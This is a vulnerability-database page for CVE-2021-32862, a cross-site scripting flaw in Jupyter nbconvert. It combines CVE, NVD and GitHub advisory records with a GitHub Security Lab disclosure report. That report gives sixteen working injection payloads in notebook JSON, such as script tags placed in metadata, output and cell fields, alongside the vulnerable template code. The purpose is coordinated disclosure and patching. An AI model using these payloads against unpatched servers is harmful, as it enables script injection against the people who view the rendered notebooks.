Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2021-32862 (GCVE-0-2021-32862)
Vulnerability from cvelistv5 – Published: 2022-08-18 00:00 – Updated: 2024-09-02 21:02
VLAI?
EPSS
Title
nbconvert vulnerable to cross-site scripting (XSS) via multiple exploit paths
Summary
The GitHub Security Lab discovered sixteen ways to exploit a cross-site scripting vulnerability in nbconvert. When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to cross-site scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer).
Severity ?
7.5 (High)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-09-02T21:02:59.728Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://github.com/jupyter/nbconvert/security/advisories/GHSA-9jmq-rx5f-8jwq"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/jupyter/nbviewer/security/advisories/GHSA-h274-fcvj-h2wm"
},
{
"name": "[debian-lts-announce] 20230603 [SECURITY] [DLA 3442-1] nbconvert security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00003.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00004.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "nbconvert",
"vendor": "jupyter",
"versions": [
{
"status": "affected",
"version": "\u003c= 6.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The GitHub Security Lab discovered sixteen ways to exploit a cross-site scripting vulnerability in nbconvert. When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to cross-site scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer)."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-06-03T00:00:00.000Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"url": "https://github.com/jupyter/nbconvert/security/advisories/GHSA-9jmq-rx5f-8jwq"
},
{
"url": "https://github.com/jupyter/nbviewer/security/advisories/GHSA-h274-fcvj-h2wm"
},
{
"name": "[debian-lts-announce] 20230603 [SECURITY] [DLA 3442-1] nbconvert security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00003.html"
}
],
"source": {
"advisory": "GHSA-9jmq-rx5f-8jwq",
"discovery": "UNKNOWN"
},
"title": "nbconvert vulnerable to cross-site scripting (XSS) via multiple exploit paths"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2021-32862",
"datePublished": "2022-08-18T00:00:00.000Z",
"dateReserved": "2021-05-12T00:00:00.000Z",
"dateUpdated": "2024-09-02T21:02:59.728Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
GSD-2021-32862
Vulnerability from gsd - Updated: 2023-12-13 01:23Details
The GitHub Security Lab discovered sixteen ways to exploit a cross-site scripting vulnerability in nbconvert. When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to cross-site scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer).
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2021-32862",
"description": "The GitHub Security Lab discovered sixteen ways to exploit a cross-site scripting vulnerability in nbconvert. When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to cross-site scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer).",
"id": "GSD-2021-32862",
"references": [
"https://www.suse.com/security/cve/CVE-2021-32862.html"
]
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2021-32862"
],
"details": "The GitHub Security Lab discovered sixteen ways to exploit a cross-site scripting vulnerability in nbconvert. When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to cross-site scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer).",
"id": "GSD-2021-32862",
"modified": "2023-12-13T01:23:08.744778Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2021-32862",
"STATE": "PUBLIC",
"TITLE": "nbconvert vulnerable to cross-site scripting (XSS) via multiple exploit paths"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "nbconvert",
"version": {
"version_data": [
{
"version_value": "\u003c= 6.2"
}
]
}
}
]
},
"vendor_name": "jupyter"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The GitHub Security Lab discovered sixteen ways to exploit a cross-site scripting vulnerability in nbconvert. When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to cross-site scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer)."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/jupyter/nbconvert/security/advisories/GHSA-9jmq-rx5f-8jwq",
"refsource": "CONFIRM",
"url": "https://github.com/jupyter/nbconvert/security/advisories/GHSA-9jmq-rx5f-8jwq"
},
{
"name": "https://github.com/jupyter/nbviewer/security/advisories/GHSA-h274-fcvj-h2wm",
"refsource": "MISC",
"url": "https://github.com/jupyter/nbviewer/security/advisories/GHSA-h274-fcvj-h2wm"
},
{
"name": "[debian-lts-announce] 20230603 [SECURITY] [DLA 3442-1] nbconvert security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00003.html"
}
]
},
"source": {
"advisory": "GHSA-9jmq-rx5f-8jwq",
"discovery": "UNKNOWN"
}
},
"gitlab.com": {
"advisories": [
{
"affected_range": "\u003c=6.2",
"affected_versions": "All versions up to 6.2",
"cwe_ids": [
"CWE-1035",
"CWE-79",
"CWE-937"
],
"date": "2022-08-10",
"description": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027) in nbconvert.",
"fixed_versions": [
"6.3"
],
"identifier": "GMS-2022-3467",
"identifiers": [
"GHSA-9jmq-rx5f-8jwq",
"GMS-2022-3467",
"CVE-2021-32862"
],
"not_impacted": "All versions after 6.2",
"package_slug": "pypi/nbconvert",
"pubdate": "2022-08-10",
"solution": "Upgrade to version 6.3 or above.",
"title": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"urls": [
"https://github.com/jupyter/nbconvert/security/advisories/GHSA-9jmq-rx5f-8jwq",
"https://github.com/advisories/GHSA-9jmq-rx5f-8jwq"
],
"uuid": "0338b6cf-c0d6-428e-b038-f823779a667b"
}
]
},
"nvd.nist.gov": {
"cve": {
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jupyter:nbconvert:*:*:*:*:*:python:*:*",
"matchCriteriaId": "9435F75B-A4F7-483E-BB77-312C5AE7BD31",
"versionEndIncluding": "6.2.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The GitHub Security Lab discovered sixteen ways to exploit a cross-site scripting vulnerability in nbconvert. When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to cross-site scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer)."
},
{
"lang": "es",
"value": "GitHub Security Lab detect\u00f3 diecis\u00e9is formas de explotar una vulnerabilidad de tipo cross-site scripting en nbconvert. Cuando es usado nbconvert para generar una versi\u00f3n HTML de un cuaderno controlable por el usuario, es posible inyectar HTML arbitrario que puede conllevar a vulnerabilidades de tipo cross-site scripting (XSS) si estos cuadernos HTML son servidos por un servidor web (por ejemplo: nbviewer)."
}
],
"id": "CVE-2021-32862",
"lastModified": "2024-01-25T21:29:55.253",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2022-08-18T19:15:14.337",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jupyter/nbconvert/security/advisories/GHSA-9jmq-rx5f-8jwq"
},
{
"source": "security-advisories@github.com",
"tags": [
"Broken Link"
],
"url": "https://github.com/jupyter/nbviewer/security/advisories/GHSA-h274-fcvj-h2wm"
},
{
"source": "security-advisories@github.com",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00003.html"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
}
}
}
FKIE_CVE-2021-32862
Vulnerability from fkie_nvd - Published: 2022-08-18 19:15 - Updated: 2024-11-21 06:07
Severity ?
7.5 (High) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Summary
The GitHub Security Lab discovered sixteen ways to exploit a cross-site scripting vulnerability in nbconvert. When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to cross-site scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer).
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| jupyter | nbconvert | * | |
| debian | debian_linux | 10.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jupyter:nbconvert:*:*:*:*:*:python:*:*",
"matchCriteriaId": "9435F75B-A4F7-483E-BB77-312C5AE7BD31",
"versionEndIncluding": "6.2.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The GitHub Security Lab discovered sixteen ways to exploit a cross-site scripting vulnerability in nbconvert. When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to cross-site scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer)."
},
{
"lang": "es",
"value": "GitHub Security Lab detect\u00f3 diecis\u00e9is formas de explotar una vulnerabilidad de tipo cross-site scripting en nbconvert. Cuando es usado nbconvert para generar una versi\u00f3n HTML de un cuaderno controlable por el usuario, es posible inyectar HTML arbitrario que puede conllevar a vulnerabilidades de tipo cross-site scripting (XSS) si estos cuadernos HTML son servidos por un servidor web (por ejemplo: nbviewer)."
}
],
"id": "CVE-2021-32862",
"lastModified": "2024-11-21T06:07:54.300",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2022-08-18T19:15:14.337",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jupyter/nbconvert/security/advisories/GHSA-9jmq-rx5f-8jwq"
},
{
"source": "security-advisories@github.com",
"tags": [
"Broken Link"
],
"url": "https://github.com/jupyter/nbviewer/security/advisories/GHSA-h274-fcvj-h2wm"
},
{
"source": "security-advisories@github.com",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00003.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jupyter/nbconvert/security/advisories/GHSA-9jmq-rx5f-8jwq"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "https://github.com/jupyter/nbviewer/security/advisories/GHSA-h274-fcvj-h2wm"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00003.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00004.html"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
GHSA-9JMQ-RX5F-8JWQ
Vulnerability from github – Published: 2022-08-10 17:51 – Updated: 2024-01-25 22:10
VLAI?
Summary
nbconvert vulnerable to cross-site scripting (XSS) via multiple exploit paths
Details
Most of the fixes will be in this repo, though, so having it here gives us the private fork to work on patches
Below is currently a duplicate of the original report:
Received on security@ipython.org unedited, I'm not sure if we want to make it separate advisories.
Pasted raw for now, feel free to edit or make separate advisories if you have the rights to.
I think the most important is to switch back from nbviewer.jupyter.org -> nbviewer.org at the cloudflare level I guess ? There might be fastly involved as well.
Impact
What kind of vulnerability is it? Who is impacted?
Patches
Has the problem been patched? What versions should users upgrade to?
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
References
Are there any links users can visit to find out more?
For more information
If you have any questions or comments about this advisory: * Open an issue in example link to repo * Email us at example email address
GitHub Security Lab (GHSL) Vulnerability Report
The GitHub Security Lab team has identified potential security vulnerabilities in nbconvert.
We are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team.
If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at securitylab@github.com (please include GHSL-2021-1013, GHSL-2021-1014, GHSL-2021-1015, GHSL-2021-1016, GHSL-2021-1017, GHSL-2021-1018, GHSL-2021-1019, GHSL-2021-1020, GHSL-2021-1021, GHSL-2021-1022, GHSL-2021-1023, GHSL-2021-1024, GHSL-2021-1025, GHSL-2021-1026, GHSL-2021-1027 or GHSL-2021-1028 as a reference).
If you are NOT the correct point of contact for this report, please let us know!
Summary
When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to Cross-Site Scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer)
Product
nbconvert
Tested Version
Details
Issue 1: XSS in notebook.metadata.language_info.pygments_lexer (GHSL-2021-1013)
Attacker in control of a notebook can inject arbitrary unescaped HTML in the notebook.metadata.language_info.pygments_lexer field such as the following:
"metadata": {
"language_info": {
"pygments_lexer": "ipython3-foo\"><script>alert(1)</script>"
}
}
This node is read in the from_notebook_node method:
def from_notebook_node(self, nb, resources=None, **kw):
langinfo = nb.metadata.get('language_info', {})
lexer = langinfo.get('pygments_lexer', langinfo.get('name', None))
highlight_code = self.filters.get('highlight_code', Highlight2HTML(pygments_lexer=lexer, parent=self))
self.register_filter('highlight_code', highlight_code)
return super().from_notebook_node(nb, resources, **kw)
It is then assigned to language var and passed down to _pygments_highlight
from pygments.formatters import LatexFormatter
if not language:
language=self.pygments_lexer
latex = _pygments_highlight(source, LatexFormatter(), language, metadata)
In this method, the language variable is concatenated to highlight hl- string to conform the cssclass passed to the HTMLFormatter constructor:
return _pygments_highlight(source if len(source) > 0 else ' ',
# needed to help post processors:
HtmlFormatter(cssclass=" highlight hl-"+language),
language, metadata)
The cssclass variable is then concatenated in the outer div class attribute
yield 0, ('<div' + (self.cssclass and ' class="%s"' % self.cssclass) + (style and (' style="%s"' % style)) + '>')
Note that the cssclass variable is also used in other unsafe places such as '<table class="%stable">' % self.cssclass + filename_tr +)
Issue 2: XSS in notebook.metadata.title (GHSL-2021-1014)
The notebook.metadata.title node is rendered directly to the index.html.j2 HTML template with no escaping:
{% set nb_title = nb.metadata.get('title', '') or resources['metadata']['name'] %}
<title>{{nb_title}}</title>
The following notebook.metadata.title node will execute arbitrary javascript:
"metadata": {
"title": "TITLE</title><script>alert(1)</script>"
}
Note: this issue also affect other templates, not just the lab one.
Issue 3: XSS in notebook.metadata.widgets(GHSL-2021-1015)
The notebook.metadata.widgets node is rendered directly to the base.html.j2 HTML template with no escaping:
{% set mimetype = 'application/vnd.jupyter.widget-state+json'%}
{% if mimetype in nb.metadata.get("widgets",{})%}
<script type="{{ mimetype }}">
{{ nb.metadata.widgets[mimetype] | json_dumps }}
</script>
{% endif %}
The following notebook.metadata.widgets node will execute arbitrary javascript:
"metadata": {
"widgets": {
"application/vnd.jupyter.widget-state+json": {"foo": "pwntester</script><script>alert(1);//"}
}
}
Note: this issue also affect other templates, not just the lab one.
Issue 4: XSS in notebook.cell.metadata.tags(GHSL-2021-1016)
The notebook.cell.metadata.tags nodes are output directly to the celltags.j2 HTML template with no escaping:
{%- macro celltags(cell) -%}
{% if cell.metadata.tags | length > 0 -%}
{% for tag in cell.metadata.tags -%}
{{ ' celltag_' ~ tag -}}
{%- endfor -%}
{%- endif %}
{%- endmacro %}
The following notebook.cell.metadata.tags node will execute arbitrary javascript:
{
"cell_type": "code",
"execution_count": null,
"id": "727d1a5f",
"metadata": {
"tags": ["FOO\"><script>alert(1)</script><div \""]
},
"outputs": [],
"source": []
}
],
Note: this issue also affect other templates, not just the lab one.
Issue 5: XSS in output data text/html cells(GHSL-2021-1017)
Using the text/html output data mime type allows arbitrary javascript to be executed when rendering an HTML notebook. This is probably by design, however, it would be nice to enable an option which uses an HTML sanitizer preprocessor to strip down all javascript elements:
The following is an example of a cell with text/html output executing arbitrary javascript code:
{
"cell_type": "code",
"execution_count": 5,
"id": "b72e53fa",
"metadata": {},
"outputs": [
{
"data": {
"text/html": [
"<script>alert(1)</script>"
]
},
"execution_count": 5,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"import os; os.system('touch /tmp/pwned')"
]
},
Issue 6: XSS in output data image/svg+xml cells(GHSL-2021-1018)
Using the image/svg+xml output data mime type allows arbitrary javascript to be executed when rendering an HTML notebook.
The cell.output.data["image/svg+xml"] nodes are rendered directly to the base.html.j2 HTML template with no escaping
{%- else %}
{{ output.data['image/svg+xml'] }}
{%- endif %}
The following cell.output.data["image/svg+xml"] node will execute arbitrary javascript:
{
"output_type": "execute_result",
"data": {
"image/svg+xml": ["<script>console.log(\"image/svg+xml output\")</script>"]
},
"execution_count": null,
"metadata": {
}
}
Issue 7: XSS in notebook.cell.output.svg_filename(GHSL-2021-1019)
The cell.output.svg_filename nodes are rendered directly to the base.html.j2 HTML template with no escaping
{%- if output.svg_filename %}
<img src="{{ output.svg_filename | posix_path }}">
The following cell.output.svg_filename node will escape the img tag context and execute arbitrary javascript:
{
"cell_type": "code",
"execution_count": null,
"id": "b72e53fa",
"metadata": {},
"outputs": [
{
"output_type": "execute_result",
"svg_filename": "\"><script>alert(1)</script>",
"data": {
"image/svg+xml": [""]
},
"execution_count": null,
"metadata": {
}
}
],
"source": [""]
},
Issue 8: XSS in output data text/markdown cells(GHSL-2021-1020)
Using the text/markdown output data mime type allows arbitrary javascript to be executed when rendering an HTML notebook.
The cell.output.data["text/markdown"] nodes are rendered directly to the base.html.j2 HTML template with no escaping
{{ output.data['text/markdown'] | markdown2html }}
The following cell.output.data["text/markdown"] node will execute arbitrary javascript:
{
"output_type": "execute_result",
"data": {
"text/markdown": ["<script>console.log(\"text/markdown output\")</script>"]
},
"execution_count": null,
"metadata": {}
}
Issue 9: XSS in output data application/javascript cells(GHSL-2021-1021)
Using the application/javascript output data mime type allows arbitrary javascript to be executed when rendering an HTML notebook. This is probably by design, however, it would be nice to enable an option which uses an HTML sanitizer preprocessor to strip down all javascript elements:
The cell.output.data["application/javascript"] nodes are rendered directly to the base.html.j2 HTML template with no escaping
<script type="text/javascript">
var element = document.getElementById('{{ div_id }}');
{{ output.data['application/javascript'] }}
</script>
The following cell.output.data["application/javascript"] node will execute arbitrary javascript:
{
"output_type": "execute_result",
"data": {
"application/javascript": ["console.log(\"application/javascript output\")"]
},
"execution_count": null,
"metadata": {}
}
Issue 10: XSS is output.metadata.filenames image/png and image/jpeg(GHSL-2021-1022)
The cell.output.metadata.filenames["images/png"] and cell.metadata.filenames["images/jpeg"] nodes are rendered directly to the base.html.j2 HTML template with no escaping:
{%- if 'image/png' in output.metadata.get('filenames', {}) %}
<img src="{{ output.metadata.filenames['image/png'] | posix_path }}"
The following filenames node will execute arbitrary javascript:
{
"output_type": "execute_result",
"data": {
"image/png": [""]
},
"execution_count": null,
"metadata": {
"filenames": {
"image/png": "\"><script>console.log(\"output.metadata.filenames.image/png injection\")</script>"
}
}
}
Issue 11: XSS in output data image/png and image/jpeg cells(GHSL-2021-1023)
Using the image/png or image/jpeg output data mime type allows arbitrary javascript to be executed when rendering an HTML notebook.
The cell.output.data["images/png"] and cell.output.data["images/jpeg"] nodes are rendered directly to the base.html.j2 HTML template with no escaping:
{%- else %}
<img src="data:image/png;base64,{{ output.data['image/png'] }}"
{%- endif %}
The following cell.output.data["image/png"] node will execute arbitrary javascript:
{
"output_type": "execute_result",
"data": {
"image/png": ["\"><script>console.log(\"image/png output\")</script>"]
},
"execution_count": null,
"metadata": {}
}
Issue 12: XSS is output.metadata.width/height image/png and image/jpeg(GHSL-2021-1024)
The cell.output.metadata.width and cell.output.metadata.height nodes of both image/png and image/jpeg cells are rendered directly to the base.html.j2 HTML template with no escaping:
{%- set width=output | get_metadata('width', 'image/png') -%}
width={{ width }}
{%- set height=output | get_metadata('height', 'image/png') -%}
height={{ height }}
The following output.metadata.width node will execute arbitrary javascript:
{
"output_type": "execute_result",
"data": {
"image/png": ["abcd"]
},
"execution_count": null,
"metadata": {
"width": "><script>console.log(\"output.metadata.width png injection\")</script>"
}
}
Issue 13: XSS in output data application/vnd.jupyter.widget-state+json cells(GHSL-2021-1025)
The cell.output.data["application/vnd.jupyter.widget-state+json"] nodes are rendered directly to the base.html.j2 HTML template with no escaping:
{% set datatype_list = output.data | filter_data_type %}
{% set datatype = datatype_list[0]%}
<script type="{{ datatype }}">
{{ output.data[datatype] | json_dumps }}
</script>
The following cell.output.data["application/vnd.jupyter.widget-state+json"] node will execute arbitrary javascript:
{
"output_type": "execute_result",
"data": {
"application/vnd.jupyter.widget-state+json": "\"</script><script>console.log('output.data.application/vnd.jupyter.widget-state+json injection')//"
},
"execution_count": null,
"metadata": {}
}
Issue 14: XSS in output data application/vnd.jupyter.widget-view+json cells(GHSL-2021-1026)
The cell.output.data["application/vnd.jupyter.widget-view+json"] nodes are rendered directly to the base.html.j2 HTML template with no escaping:
{% set datatype_list = output.data | filter_data_type %}
{% set datatype = datatype_list[0]%}
<script type="{{ datatype }}">
{{ output.data[datatype] | json_dumps }}
</script>
The following cell.output.data["application/vnd.jupyter.widget-view+json"] node will execute arbitrary javascript:
{
"output_type": "execute_result",
"data": {
"application/vnd.jupyter.widget-view+json": "\"</script><script>console.log('output.data.application/vnd.jupyter.widget-view+json injection')//"
},
"execution_count": null,
"metadata": {}
}
Issue 15: XSS in raw cells(GHSL-2021-1027)
Using a raw cell type allows arbitrary javascript to be executed when rendering an HTML notebook. This is probably by design, however, it would be nice to enable an option which uses an HTML sanitizer preprocessor to strip down all javascript elements:
The following is an example of a raw cell executing arbitrary javascript code:
{
"cell_type": "raw",
"id": "372c2bf1",
"metadata": {},
"source": [
"Payload in raw cell <script>alert(1)</script>"
]
}
Issue 16: XSS in markdown cells(GHSL-2021-1028)
Using a markdown cell type allows arbitrary javascript to be executed when rendering an HTML notebook. This is probably by design, however, it would be nice to enable an option which uses an HTML sanitizer preprocessor to strip down all javascript elements:
The following is an example of a markdown cell executing arbitrary javascript code:
{
"cell_type": "markdown",
"id": "2d42de4a",
"metadata": {},
"source": [
"<script>alert(1)</script>"
]
},
Proof of Concept
These vulnerabilities may affect any server using nbconvert to generate HTML and not using a secure content-security-policy (CSP) policy. For example nbviewer is vulnerable to the above mentioned XSS issues:
- Create Gist with payload. eg:
-
https://gist.github.com/pwntester/ff027d91955369b85f99bb1768b7f02c -
Then load gist on nbviewer. eg:
https://nbviewer.jupyter.org/gist/pwntester/ff027d91955369b85f99bb1768b7f02c
Note: response is served with content-security-policy: connect-src 'none';
GitHub Security Advisories
We recommend you create a private GitHub Security Advisory for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are published.
Credit
These issues were discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-1013, GHSL-2021-1014, GHSL-2021-1015, GHSL-2021-1016, GHSL-2021-1017, GHSL-2021-1018, GHSL-2021-1019, GHSL-2021-1020, GHSL-2021-1021, GHSL-2021-1022, GHSL-2021-1023, GHSL-2021-1024, GHSL-2021-1025, GHSL-2021-1026, GHSL-2021-1027 or GHSL-2021-1028 in any communication regarding these issues.
Disclosure Policy
This report is subject to our coordinated disclosure policy.
Severity ?
5.4 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "nbconvert"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.5.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-32862"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2022-08-10T17:51:53Z",
"nvd_published_at": "2022-08-18T19:15:00Z",
"severity": "MODERATE"
},
